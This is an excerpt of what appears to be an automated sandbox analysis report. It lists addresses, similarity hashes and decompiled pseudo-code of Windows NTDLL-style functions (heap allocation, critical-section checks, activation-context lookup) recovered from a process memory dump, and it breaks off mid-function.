                                                                                        0x00c438ad
                                                                                        0x00c438ae
                                                                                        0x00c438af
                                                                                        0x00c438b1
                                                                                        0x00c438b4
                                                                                        0x00c438bb
                                                                                        0x00c438bc
                                                                                        0x00c438bd
                                                                                        0x00c438c4
                                                                                        0x00c438c8
                                                                                        0x00c438ca
                                                                                        0x00c438ca
                                                                                        0x00c438d5
                                                                                        0x00c4393e
                                                                                        0x00c43940
                                                                                        0x00c43942
                                                                                        0x00c43952
                                                                                        0x00c43954
                                                                                        0x00c43961
                                                                                        0x00c43961
                                                                                        0x00c43967
                                                                                        0x00c4396e
                                                                                        0x00c4396e
                                                                                        0x00c43947
                                                                                        0x00c4394c
                                                                                        0x00000000
                                                                                        0x00c4394c
                                                                                        0x00c438ea
                                                                                        0x00c438ee
                                                                                        0x00c438f8
                                                                                        0x00c438f9
                                                                                        0x00c438ff
                                                                                        0x00c43900
                                                                                        0x00c43902
                                                                                        0x00c43903
                                                                                        0x00c4390b
                                                                                        0x00c4390f
                                                                                        0x00c43950
                                                                                        0x00000000
                                                                                        0x00c43950
                                                                                        0x00c43915
                                                                                        0x00c4391d
                                                                                        0x00c4391d
                                                                                        0x00c43922
                                                                                        0x00c43926
                                                                                        0x00000000
                                                                                        0x00c43928
                                                                                        0x00c4392b
                                                                                        0x00c4392b
                                                                                        0x00c43935
                                                                                        0x00c43937
                                                                                        0x00c43937
                                                                                        0x00000000
                                                                                        0x00c43935
                                                                                        0x00c43926
                                                                                        0x00c438f0
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: BinaryName
                                                                                        • API String ID: 0-215506332
                                                                                        • Opcode ID: e65701ab801eb4afe03e3bee35937b2cd4bfd14e1a544d3766d571c3bf4158bb
                                                                                        • Instruction ID: 94b4a282cbeca3cd80f789bb465d640121d863d31581d8bc091db2d78f833d85
                                                                                        • Opcode Fuzzy Hash: e65701ab801eb4afe03e3bee35937b2cd4bfd14e1a544d3766d571c3bf4158bb
                                                                                        • Instruction Fuzzy Hash: 34310132D0055ABFEB15DA59C946E6BF7B4FBE0B20F114169F814A7281D7709F40CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 33%
                                                                                        			E00BFD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xcbd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00BE4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00C0B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00C098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00C095D0();
					L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                        0x00bfd29c
                                                                                        0x00bfd2a6
                                                                                        0x00bfd2b1
                                                                                        0x00bfd2b5
                                                                                        0x00bfd2b6
                                                                                        0x00bfd2bc
                                                                                        0x00bfd2bd
                                                                                        0x00bfd2be
                                                                                        0x00bfd2bf
                                                                                        0x00bfd2c2
                                                                                        0x00bfd2c4
                                                                                        0x00bfd2cc
                                                                                        0x00bfd384
                                                                                        0x00bfd34b
                                                                                        0x00bfd34f
                                                                                        0x00bfd350
                                                                                        0x00bfd351
                                                                                        0x00bfd35c
                                                                                        0x00bfd35c
                                                                                        0x00bfd2d6
                                                                                        0x00bfd2da
                                                                                        0x00bfd2e1
                                                                                        0x00bfd361
                                                                                        0x00bfd369
                                                                                        0x00bfd36d
                                                                                        0x00bfd2e3
                                                                                        0x00bfd2e3
                                                                                        0x00bfd2e3
                                                                                        0x00bfd2e5
                                                                                        0x00bfd2ed
                                                                                        0x00bfd2f5
                                                                                        0x00bfd2fa
                                                                                        0x00bfd302
                                                                                        0x00bfd303
                                                                                        0x00bfd30b
                                                                                        0x00bfd30f
                                                                                        0x00bfd313
                                                                                        0x00bfd318
                                                                                        0x00bfd31c
                                                                                        0x00bfd320
                                                                                        0x00bfd379
                                                                                        0x00bfd37d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c3affe
                                                                                        0x00c3b001
                                                                                        0x00c3b011
                                                                                        0x00000000
                                                                                        0x00bfd322
                                                                                        0x00bfd322
                                                                                        0x00bfd330
                                                                                        0x00bfd337
                                                                                        0x00bfd35d
                                                                                        0x00bfd339
                                                                                        0x00bfd33f
                                                                                        0x00bfd38c
                                                                                        0x00bfd38c
                                                                                        0x00bfd33f
                                                                                        0x00bfd349
                                                                                        0x00000000
                                                                                        0x00bfd349

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 8f15ba6a1c4cb93696b0d610c5eff12b77319ab6365ead38217ee01cd0b41009
                                                                                        • Instruction ID: c0b01d2ebd2200dee13bf50d21cb9dde3dae4f834005975301683135fe4ab355
                                                                                        • Opcode Fuzzy Hash: 8f15ba6a1c4cb93696b0d610c5eff12b77319ab6365ead38217ee01cd0b41009
                                                                                        • Instruction Fuzzy Hash: CA31C2B25083099FC711DF28C881A6BBBE9EB89754F10096EFA9483251D734DD08DB97
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BD1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 72%
                                                                                        			E00BD1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00C0BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00C0A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00C0A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00BE4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                        0x00bd1b8f
                                                                                        0x00bd1b9a
                                                                                        0x00bd1b9c
                                                                                        0x00bd1b9e
                                                                                        0x00bd1ba3
                                                                                        0x00c27010
                                                                                        0x00c27010
                                                                                        0x00000000
                                                                                        0x00bd1ba9
                                                                                        0x00bd1ba9
                                                                                        0x00bd1bae
                                                                                        0x00000000
                                                                                        0x00bd1bc5
                                                                                        0x00bd1bca
                                                                                        0x00bd1bcf
                                                                                        0x00bd1bd0
                                                                                        0x00bd1bd1
                                                                                        0x00bd1bd2
                                                                                        0x00bd1bd6
                                                                                        0x00bd1bdc
                                                                                        0x00bd1be0
                                                                                        0x00c26ffc
                                                                                        0x00c27000
                                                                                        0x00000000
                                                                                        0x00c27006
                                                                                        0x00c27009
                                                                                        0x00c27009
                                                                                        0x00bd1be6
                                                                                        0x00bd1bec
                                                                                        0x00bd1c0b
                                                                                        0x00bd1c0b
                                                                                        0x00bd1c0c
                                                                                        0x00bd1c11
                                                                                        0x00bd1c12
                                                                                        0x00bd1c15
                                                                                        0x00bd1c1b
                                                                                        0x00bd1c1f
                                                                                        0x00bd1c31
                                                                                        0x00bd1c33
                                                                                        0x00c27026
                                                                                        0x00c27026
                                                                                        0x00bd1c21
                                                                                        0x00bd1c24
                                                                                        0x00bd1c24
                                                                                        0x00bd1bee
                                                                                        0x00bd1bee
                                                                                        0x00bd1bf2
                                                                                        0x00bd1c3a
                                                                                        0x00bd1bf4
                                                                                        0x00bd1bf4
                                                                                        0x00bd1c05
                                                                                        0x00bd1c05
                                                                                        0x00bd1c09
                                                                                        0x00bd1c3e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd1c09
                                                                                        0x00bd1bec
                                                                                        0x00bd1be0
                                                                                        0x00bd1bae
                                                                                        0x00bd1c2e

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: WindowsExcludedProcs
                                                                                        • API String ID: 0-3583428290
                                                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                        • Instruction ID: 665de31852ebed8f249ded0966ccc911f3a4fcd9bd6e915e12b8ef6bb1d7f5a3
                                                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                        • Instruction Fuzzy Hash: E0212276654628BBCB219A5D9880F6BF7ECEF41B10F1948A2F9059F300E630DD00E7A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00BEF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                        0x00bef71d
                                                                                        0x00bef722
                                                                                        0x00bef726
                                                                                        0x00c34770
                                                                                        0x00bef765
                                                                                        0x00bef769
                                                                                        0x00bef769
                                                                                        0x00bef732
                                                                                        0x00c3477a
                                                                                        0x00000000
                                                                                        0x00c3477a
                                                                                        0x00bef738
                                                                                        0x00bef73a
                                                                                        0x00bef73c
                                                                                        0x00bef73f
                                                                                        0x00bef746
                                                                                        0x00bef778
                                                                                        0x00bef7a9
                                                                                        0x00bef7a9
                                                                                        0x00bef754
                                                                                        0x00bef75a
                                                                                        0x00bef75d
                                                                                        0x00bef75f
                                                                                        0x00bef761
                                                                                        0x00bef76f
                                                                                        0x00bef771
                                                                                        0x00bef771
                                                                                        0x00bef76f
                                                                                        0x00bef763
                                                                                        0x00000000
                                                                                        0x00bef763
                                                                                        0x00bef77d
                                                                                        0x00bef7a3
                                                                                        0x00bef7a5
                                                                                        0x00000000
                                                                                        0x00bef7a5
                                                                                        0x00bef77f
                                                                                        0x00bef782
                                                                                        0x00bef784
                                                                                        0x00bef786
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bef788
                                                                                        0x00bef748
                                                                                        0x00bef74d
                                                                                        0x00bef78d
                                                                                        0x00bef793
                                                                                        0x00bef7b7
                                                                                        0x00bef7bc
                                                                                        0x00000000
                                                                                        0x00bef7bc
                                                                                        0x00bef798
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bef79d
                                                                                        0x00bef7b0
                                                                                        0x00000000
                                                                                        0x00bef7b0
                                                                                        0x00bef79f
                                                                                        0x00000000
                                                                                        0x00bef74f
                                                                                        0x00bef74f
                                                                                        0x00000000
                                                                                        0x00bef74f

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Actx
                                                                                        • API String ID: 0-89312691
                                                                                        • Opcode ID: 9a0a22b471ec2ee7fc460289cd9516d58d264b2cb21b00fb1db41db2ac6fe681
                                                                                        • Instruction ID: 96bd4a8c0da98f2d55eecbb32119a9efd52e8e55a8baffb01c8fb70415867bea
                                                                                        • Opcode Fuzzy Hash: 9a0a22b471ec2ee7fc460289cd9516d58d264b2cb21b00fb1db41db2ac6fe681
                                                                                        • Instruction Fuzzy Hash: 49118E353046838BEB284E1F849063672D6EB96764F3545BAE865CB391EB70DC408380
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C78DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 71%
                                                                                        			E00C78DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xca0d50);
				E00C1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00C55720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L00C1DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L00C1DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00C1D130(_t34, _t39, _t40);
			}





                                                                                        0x00c78df1
                                                                                        0x00c78df1
                                                                                        0x00c78df1
                                                                                        0x00c78df1
                                                                                        0x00c78df1
                                                                                        0x00c78df1
                                                                                        0x00c78df3
                                                                                        0x00c78df8
                                                                                        0x00c78dfd
                                                                                        0x00c78e00
                                                                                        0x00c78e0e
                                                                                        0x00c78e2a
                                                                                        0x00c78e36
                                                                                        0x00c78e38
                                                                                        0x00c78e3c
                                                                                        0x00c78e46
                                                                                        0x00c78e46
                                                                                        0x00c78e36
                                                                                        0x00c78e50
                                                                                        0x00c78e56
                                                                                        0x00c78e59
                                                                                        0x00c78e5c
                                                                                        0x00c78e60
                                                                                        0x00c78e67
                                                                                        0x00c78e6d
                                                                                        0x00c78e73
                                                                                        0x00c78e74
                                                                                        0x00c78eb1
                                                                                        0x00c78ebd

                                                                                        Strings
                                                                                        • Critical error detected %lx, xrefs: 00C78E21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Critical error detected %lx
                                                                                        • API String ID: 0-802127002
                                                                                        • Opcode ID: 91c3664fa4f81671398b49830d3349e537fcd2bbc7f40d3e2330fa014eb55f9e
                                                                                        • Instruction ID: fc493a59940ec76074c4d87268d944cbac95981ea11e80cb10c7b764b4dc8159
                                                                                        • Opcode Fuzzy Hash: 91c3664fa4f81671398b49830d3349e537fcd2bbc7f40d3e2330fa014eb55f9e
                                                                                        • Instruction Fuzzy Hash: 90116DB5D54348EBDF24CFA4850A7DCBBB0BB05315F24825DE52D6B292C7740645EF14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C5FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00C5FF60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                        • API String ID: 0-1911121157
                                                                                        • Opcode ID: 4af2382798a4fb3a210f8844ce5c821d6eb0a05ba42edfcede51c483441afcd3
                                                                                        • Instruction ID: 8c7d9dda655c08dea9c007803adf1f80c8f3132dde5f21c9f3f2f7713ce78843
                                                                                        • Opcode Fuzzy Hash: 4af2382798a4fb3a210f8844ce5c821d6eb0a05ba42edfcede51c483441afcd3
                                                                                        • Instruction Fuzzy Hash: 13112175510144EFCB16DB90C849FEC7BF1FB09705F108168F805576A2C7389E84EB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C95BA5, Relevance: .6, Instructions: 592COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 88%
                                                                                        			E00C95BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xca1178);
				E00C1D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00C94C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00C0D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00C95542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xcb60e8;
								if( *0xcb60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xcb60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00C09710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E00C06DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
